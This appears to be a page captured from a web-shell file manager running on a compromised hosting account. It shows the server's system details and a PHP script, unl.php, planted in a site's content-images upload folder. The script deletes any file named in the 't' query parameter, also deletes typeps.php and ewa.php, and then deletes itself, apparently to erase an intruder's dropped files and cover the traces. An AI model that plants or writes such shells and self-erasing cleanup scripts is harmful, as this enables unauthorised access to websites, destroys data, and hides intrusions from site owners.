HEX
Server: LiteSpeed
System: Linux premium313.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User: wekawqug (1662)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/wekawqug/ndondocup.sisihub.co.tz/assets/uploads/content_images/unl.php
<?php

if (isset($_GET["t"])) { 
    $t = $_GET["t"];
    $tt = "typeps.php";
    $ttt = "ewa.php";

    if (file_exists($tt)) {
        unlink($tt);
    }
    if (file_exists($ttt)) {
        unlink($ttt);
    }
    if (file_exists($t)) {
        unlink($t);
    }


    if (!file_exists($tt) && !file_exists($ttt) && !file_exists($t)) {
        echo "DONE";
        unlink(__FILE__); 
    } else {
        echo "AHYA";
    }
} else {
    echo "parm";
}

?>